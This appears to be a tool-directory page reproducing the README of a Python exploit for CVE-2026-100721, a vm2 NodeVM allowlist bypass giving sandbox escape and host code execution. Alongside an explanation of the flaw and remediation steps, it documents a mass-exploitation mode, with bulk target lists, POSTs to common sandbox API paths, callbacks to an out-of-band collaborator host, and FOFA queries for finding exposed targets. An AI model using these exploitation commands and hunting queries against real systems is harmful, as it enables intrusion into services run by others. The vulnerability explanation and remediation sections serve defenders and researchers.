Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-100721 — Python PoC for CVE-2026-100721: detects and exploits vm2 <3.12.2 NodeVM external allowlist bypass, achieving sandbox escape and host RCE via local lab or mass HTTP targets. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-100721
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationScripting & AutomationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmurrez/cve-2026-100721

CVE-2026-100721

Python PoC for CVE-2026-100721: detects and exploits vm2 <3.12.2 NodeVM external allowlist bypass, achieving sandbox escape and host RCE via local lab or mass HTTP targets.

5 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2026-100721 — vm2 NodeVM external allowlist bypass

Python 3 PoC for CVE-2026-100721 — vm2 (npm) before 3.12.2 incorrect authorization in the NodeVM external-module resolver, leading to sandbox escape and host-side code execution when untrusted JavaScript runs inside a misconfigured embedder.

PoC page: https://pocbit.org/pocs/cve-2026-100721


What is vm2?

vm2 is a widely used Node.js library for running untrusted JavaScript inside a sandbox within the same Node process. Applications use NodeVM with restrictions such as:

  • require.builtin — which core modules guest code may load (fs, child_process, …)
  • require.external — an allowlist of npm package names (e.g. only left-pad, lodash)
  • require.resolve — custom resolver pointing at a host-controlled plugin or dependency directory
  • context: 'host' — external packages loaded via the real host require() (common for performance)

Typical embedders: user-script platforms, low-code runners, plugin marketplaces, online IDEs, automation sandboxes, and internal “safe eval” microservices.


Vulnerability in plain language

CVE-2026-100721 is incorrect authorization (CWE-863) in how vm2 decides whether a guest require("package-name") is allowed.

Two related flaws were fixed across vm2 releases (same class of bug — name / path boundary confusion):

1. Package-name substring match (GHSA-c48m-32m9-vx93)

The allowlist pre-check builds a pattern from entries like left-pad but does not enforce a full package-name boundary. Guest code can request evil-left-pad because the string contains left-pad. If that colliding package exists on a path the custom resolver can reach, vm2 loads it in the host context. Top-level module code runs before sandbox wrapping → child_process, file read, secrets, etc.

2. Resolved path prefix match (lib/resolver-compat.js, fixed in 3.12.2)

When a custom resolver is used with context: 'host', vm2 records allowed directories using a prefix regular expression without a strict path separator / end boundary. A guest can later require() an absolute path to a non-allowlisted sibling (e.g. .../node_modules/foo2/index.js when only foo was allowlisted). The sibling passes isPathAllowedForModule and executes in the host process.

Affected: vm2 < 3.12.2 (CVE-2026-100721). Related name-collision fixes also landed in 3.11.7.
Fixed: Upgrade to vm2 ≥ 3.12.2 (and stay current).

MetricValue
CVSS 3.19.0 Critical — AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSS 4.09.5 Critical (Rapid7 / VulnCheck)
AuthExploit chain usually starts after low-privilege code execution inside the sandbox (PR:L in advisory)
CreditTencent Xuanwu Lab XlabAI, Atuin engine, Guannan Wang et al.

Attack prerequisites (real deployments)

Remote “one HTTP request RCE” is not universal. Practical chains need:

  1. Application executes attacker-controlled JS inside vm2 NodeVM.
  2. require.external allowlist + often a custom require.resolve.
  3. context: 'host' (or equivalent host loading) for externals.
  4. A colliding package already on disk or attacker can place one (plugin upload dir, synced private registry folder, tenant dependency path).

When these align, impact is full host Node compromise — not merely guest sandbox abuse.


What this PoC does

ModeBehavior
--labAuthoritative local exploit: lab/ installs vm2 3.11.5, builds evil-left-pad, demonstrates POCBIT-100721-HOST_EXEC (mirrors vendor advisory)
checkRemote vm2 fingerprint (package.json, lockfiles, JS bundles), version < 3.12.2, optional --probe-exec against common sandbox API paths
exploitMass-capable POST of allowlist-bypass probe JS (evil-left-pad, colliding names) to configurable --exec-paths; marks exploited on marker in response or sandbox API surface + --callback-url
Mass bulk--list targets.txt --mode exploit -j N → cve_2026_100721_exploit.jsonl + exploited.txt

PoCbit JSONL fields: pocbit, pocbit_catalog, pocbit_page on every row.
CLI: green/magenta PoCbit banner, [EXPLOIT] / [SENT] / [FAIL] / [HIT] coloring (--no-color to disable).

Important: Remote exploit mode targets HTTP sandbox runners you configure. For pure library verification, use python poc.py --lab (requires Node.js + npm).


Requirements

pip install -r requirements.txt
ComponentPurpose
Python 3.9+Scanner / mass driver
Node.js + npm--lab only (recommended for understanding the CVE)

Usage

Local lab (full sandbox escape proof)

cd CVE-2026-100721
python poc.py --lab

Expected on vulnerable vm2:

[+] require(evil-left-pad): POCBIT-100721-HOST_EXEC
[+] RESULT: VULNERABLE

Remote detection

python poc.py -u https://app.example.com --mode check
python poc.py -u https://app.example.com --mode check --probe-exec
python poc.py --list targets.example.txt --mode check -j 12 --probe-exec

Exploit (single target)

python poc.py -u http://127.0.0.1:3000 --mode exploit \
  --exec-paths /api/run,/api/eval --code-field code

python poc.py -u http://127.0.0.1:3000 --mode exploit \
  --callback-url http://your-collaborator.example/cve-100721

Mass bulk exploit

python poc.py --list targets.txt --mode exploit \
  --exec-paths /api/run,/api/sandbox/run \
  --callback-url http://oast.example.com/hit -j 15

Custom guest script:

python poc.py -u http://127.0.0.1:3000 --mode exploit --payload-file my_escape.js

Outputs:

  • cve_2026_100721_exploit.jsonl — per-target JSON
  • exploited.txt — targets where escape marker, callback surface, or sandbox API hit occurred

Default sandbox API paths (tunable)

The driver probes common patterns (override with --exec-paths):

/api/run, /api/eval, /api/execute, /api/sandbox/run, /api/vm/run, /api/code/run, /run, /execute, /eval, /api/v1/run, /api/playground/run, …

JSON body fields tried: code, script, source, javascript, js, payload, … (override with --code-field).


Guest payload (concept)

The built-in exploit JS loops colliding package names such as evil-left-pad (allowlist bypass PoC). On a vulnerable embedder that already hosts the colliding package:

require("evil-left-pad");  // host top-level code runs → sandbox escape

The local lab/poc.js implements the full trusted-advisory scenario with external: ['left-pad'], builtin: [], and custom resolve.


Remediation

  1. Upgrade vm2 to ≥ 3.12.2 in every service that embeds it (check lockfiles and Docker layers).
  2. Do not load externals in host context unless strictly necessary; prefer sandbox context with hardened resolver.
  3. Treat plugin / user dependency directories as untrusted — never resolve attacker-chosen package names into host require.
  4. Disable or gate public “run user code” APIs behind strong auth and static analysis.
  5. Inventory: npm ls vm2, SBOM, container scans, Shodan/FOFA for “playground” + Node stack.

FOFA / hunting (examples)

body="vm2"
header="Express"
Download Tool